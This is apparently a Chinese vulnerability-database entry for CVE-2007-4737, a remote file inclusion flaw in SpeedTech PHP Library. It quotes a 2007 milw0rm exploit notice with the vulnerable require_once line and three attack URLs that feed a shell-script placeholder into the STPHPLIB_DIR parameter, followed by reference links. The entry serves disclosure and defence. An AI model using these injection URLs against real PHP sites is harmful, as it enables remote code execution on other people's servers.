SpeedTech STPHPLibrary 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113567 漏洞类型 代码注入
发布时间 2007-09-03 更新时间 2007-09-10
CVE编号 CVE-2007-4737 CNNVD-ID CNNVD-200709-066
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4358
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-066
|漏洞详情
SpeedTechPHPLibrary(STPHPLibrary)中存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1)stphpapplication.php,(2)stphpbtnimage.php,或(3)stphpform.php的STPHPLIB_DIR参数中的一个URL执行任意PHP代码。
|漏洞EXP
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________

# SpeedTech PHP Library  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##############################################################################################
#ERROR1:stphpapplication.php
#require_once("$STPHPLIB_DIR/stphpobject.php");<<< rfi coded.
#
#Other Files:
#   stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]
#   ........................................
#   ........................................
#   ........................................
##############################################################################################
#
#http://php.html.it/script/vedi/1872/stphplibrary/
#
##############################################################################################
#
#LEETSECURITY.ORG <<<< sanal alemde bizde varýz...
############################################################################################
#coded by ..Wocker..
#
#####special thanx:###..Str0ke..####..KEZZAP66345..####..Wocker..#############################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-09-03]
|参考资料

来源:MILW0RM
名称:4358
链接:http://www.milw0rm.com/exploits/4358
来源:SECUNIA
名称:26658
链接:http://secunia.com/advisories/26658
来源:OSVDB
名称:38931
链接:http://osvdb.org/38931
来源:OSVDB
名称:38930
链接:http://osvdb.org/38930
来源:OSVDB
名称:38929
链接:http://osvdb.org/38929
来源:XF
名称:speedtech-stphplibdir-file-include(36416)
链接:http://xforce.iss.net/xforce/xfdb/36416
来源:BID
名称:25525
链接:http://www.securityfocus.com/bid/25525
来源:VUPEN
名称:ADV-2007-3092
链接:http://www.frsirt.com/english/advisories/2007/3092